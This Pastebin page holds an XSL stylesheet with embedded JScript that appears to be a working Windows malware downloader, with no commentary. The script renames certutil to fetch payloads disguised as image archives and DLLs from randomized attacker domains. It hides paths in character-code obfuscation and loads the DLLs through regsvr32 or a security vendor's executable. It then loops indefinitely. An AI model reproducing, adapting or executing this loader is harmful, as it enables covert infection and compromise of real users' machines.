Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?xml version='1.0'?>
- <stylesheet
- xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
- xmlns:user="placeholder"
- version="1.0">
- <output method="text"/>
- <ms:script implements-prefix="user" language="JScript">
- <![CDATA[
- function Bxaki(url, file)
- {
- try
- {
- xxWshShell.run("%temp%/certis.exe -urlcache -split -f "+url+" "+file,0,true);
- return true;
- }
- catch (ex)
- {
- return false;
- }
- }
- function radador(min, max)
- {
- return Math.round(Math.random()*(max-min)+min)
- }
- var xLuciferxs;
- var xCaverax;
- var xVRXastaroth;
- var xVRXastaroth2;
- var ss1;
- var stem1;
- var stem2;
- var stem3;
- var stem4;
- var pingadori;
- var sVarRaz;
- var sVarTEMRaz;
- var sVarXEDRaz;
- var smaeVar;
- var raraiz;
- xLuciferxs = false;
- xCaverax = false;
- var AppWshShell = new ActiveXObject("Scripting.FileSystemObject");
- var WshShell = new ActiveXObject("WScript.Shell");
- var sdjkhiwewsw = new ActiveXObject("WScript.Shell");
- var kdcafex = new ActiveXObject("WScript.Shell");
- var MaisShell = new ActiveXObject("WScript.Shell");
- var xxWshShell = new ActiveXObject("WScript.Shell");
- var masterAppData = new ActiveXObject("WScript.Shell");
- var WSh = new ActiveXObject("WScript.Shell");
- var ShA = new ActiveXObject("Shell.Application");
- try
- {
- AppWshShell.CopyFile("C:\\Windows\\System32\\certutil.exe",masterAppData.ExpandEnvironmentStrings("%temp%")+"\\certis.exe");
- }
- catch (ex)
- {
- }
- try
- {
- AppWshShell.CopyFile("C:\\Windows\\System32\\regsvr32.exe",sVarTEMRaz);
- }
- catch (ex)
- {
- }
- function vgos(min)
- {
- xCaverax = false;
- smaeVar = "09/";
- pingadori = radador(1,7);
- if (pingadori == 1)
- {
- xVRXastaroth = "http://ewwtw"+radador(1111111,9999999)+".justcheuty.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 2)
- {
- xVRXastaroth = "http://exxxwrtw"+radador(1111111,9999999)+".kloudghtlp.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 3)
- {
- xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchotlo.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 4)
- {
- xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchtt.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 5)
- {
- xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".navegador04890.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 6)
- {
- xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".blackjoud.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- if (pingadori == 7)
- {
- xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchttb.com:"+radador(25000,25099)+"/"+smaeVar;
- }
- xVRXastaroth2 = "http://ewrtw"+radador(1111111,9999999)+".lojadanetssx.website:"+radador(25000,25099)+"/"+smaeVar;
- sVarRaz = "C:\\ProgramData\\tempa";
- sVarXEDRaz = "C:\\ProgramData\\xxx"+radador(1111111,9999999)+"xx";
- sVarTEMRaz = masterAppData.ExpandEnvironmentStrings("%temp%")+"\\regs"+radador(1111111,9999999)+".exe";
- raraiz = "undefined";
- try
- {
- var fso = new ActiveXObject("Scripting.FileSystemObject");
- fso.CreateFolder(sVarRaz);
- }
- catch (ex)
- {
- }
- try
- {
- var fsosw = new ActiveXObject("Scripting.FileSystemObject");
- fsosw.CreateFolder(sVarXEDRaz);
- }
- catch (ex)
- {
- }
- try
- {
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhm64.dll")){
- f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");
- if (f.size < 10 ){
- f.Delete();
- f.Close();
- }
- }
- }
- catch (ex)
- {
- }
- try
- {
- if (!AppWshShell.FileExists(sVarRaz+"\\0131vrxi.log")){
- f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");
- f.Delete();
- f.Close();
- }
- }
- catch (ex)
- {
- }
- try
- {
- if (!AppWshShell.FileExists(sVarRaz+"\\0131refor.log")){
- f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");
- f.Delete();
- f.Close();
- }
- }
- catch (ex)
- {
- }
- stem1 = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(80)+String.fromCharCode(114)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(32)+String.fromCharCode(70)+String.fromCharCode(105)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(115);
- stem2 = String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(65)+String.fromCharCode(86)+String.fromCharCode(65)+String.fromCharCode(83)+String.fromCharCode(84)+String.fromCharCode(32)+String.fromCharCode(83)+String.fromCharCode(111)+String.fromCharCode(102)+String.fromCharCode(116)+String.fromCharCode(119)+String.fromCharCode(97)+String.fromCharCode(114)+String.fromCharCode(101)+String.fromCharCode(92)+String.fromCharCode(92);
- stem3 = String.fromCharCode(65)+String.fromCharCode(118)+String.fromCharCode(97)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(97)+String.fromCharCode(115)+String.fromCharCode(119)+String.fromCharCode(82)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(68)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101);
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmdwwn.gif")){
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhme.jpg")){
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmf.jpg")){
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmg.gif")){
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmxa.gif")){
- if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhm64.dll")){
- ss1 = "marxvxinhhm64.dll";
- if (AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- xxWshShell.run('"'+stem1+stem2+stem3+'" "'+sVarRaz+"\\"+ss1+'" /dasd /'+radador(0000001,999999999),0,true);
- }
- catch (ex)
- {
- }
- }
- if (!AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- xxWshShell.run('regsvr32.exe /s "'+sVarRaz+"\\"+ss1+'"',0,true);
- }
- catch (ex)
- {
- }
- }
- xCaverax = true;
- }
- }
- }
- }
- }
- }
- if (xCaverax == false)
- {
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhma.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\\marxvxinhhma.jpg");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhma.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\\marxvxinhhma.jpg");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmb.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmb.jpg");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmb.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmb.jpg");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmc.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmc.jpg");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmc.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmc.jpg");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmdwwn.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdwwn.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmdwwn.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdwwn.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmdx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdx.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmdx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdx.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhme.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhme.jpg");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhme.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhme.jpg");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmf.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmf.jpg");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmf.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmf.jpg");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmg.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmg.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmg.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmg.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmgx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmgx.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmgx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmgx.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmxa.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxa.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmxa.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxa.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmxb.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxb.gif");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmxb.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxb.gif");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"r1.log",sVarRaz+"\\r1.log");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"r1.log",sVarRaz+"\\r1.log");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhm98.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm98.dll");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhm98.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm98.dll");
- }
- }
- catch (ex)
- {
- }
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm64.dll");
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm64.dll");
- }
- }
- catch (ex)
- {
- }
- stem4 = sVarXEDRaz+"\\marxvxinhhm64"+radador(0000001,999999999)+".dll";
- if (! AppWshShell.FileExists(stem4)){
- try
- {
- xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),stem4);
- if (xLuciferxs == false) {
- Bxaki(xVRXastaroth2+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),stem4);
- }
- }
- catch (ex)
- {
- }
- }
- xxWshShell.run('cmd /k echo %time% && timeout 5 > NUL && exit',0,true);
- if (AppWshShell.FileExists(stem4)){
- ss1 = "marxvxinhhm64.dll";
- if (AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- //xxWshShell.run(stem1+stem2+stem3+' "'+stem4+'" /kct'+radador(0000001,999999999),0,true);
- ShA.ShellExecute(stem1+stem2+stem3,' "'+stem4+'" /kct'+radador(0000001,999999999), " ", "open", 0);
- }
- catch (ex)
- {
- }
- }
- if (!AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- //xxWshShell.run('regsvr32.exe /s "'+stem4+'"', 0,true);
- //ShA.ShellExecute("cmd", " /k "+sVarTEMRaz+' /s "'+stem4+'"', " ", "open", 0);
- //ShA.ShellExecute("cmd", ' /k "regsvr32 /s "'+stem4+'"', " ", "open", 0);
- ShA.ShellExecute("regsvr32.exe", ' /s "'+stem4+'"', " ", "open", 1);
- }
- catch (ex)
- {
- }
- }
- }
- ss1 = "marxvxinhhm64.dll";
- if (AppWshShell.FileExists(sVarRaz+"\\"+ss1)){
- if (AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- //xxWshShell.run('"'+stem1+stem2+stem3+'" "'+sVarRaz+"\\"+ss1+'" /kct'+radador(0000001,999999999),0,true);
- ShA.ShellExecute(stem1+stem2+stem3,' "'+sVarRaz+"\\"+ss1+'" /kct'+radador(0000001,999999999), " ", "open", 0);
- }
- catch (ex)
- {
- }
- }
- if (!AppWshShell.FileExists(stem1+stem2+stem3)){
- try
- {
- //xxWshShell.run('regsvr32.exe /s "'+sVarRaz+"\\"+ss1+'"',0,true);
- ShA.ShellExecute("regsvr32.exe", ' /s "'+sVarRaz+"\\"+ss1+'"', " ", "open", 0);
- }
- catch (ex)
- {
- }
- }
- }
- }
- xxWshShell.run('cmd /k echo %time% && timeout 4000 > NUL && exit',0,true);
- vgos(radador(0000001,999999999));
- }
- xxWshShell.run('cmd /k echo %time% && timeout 5 > NUL && exit',0,true);
- vgos(radador(0000001,999999999));
- ]]> </ms:script>
- </stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement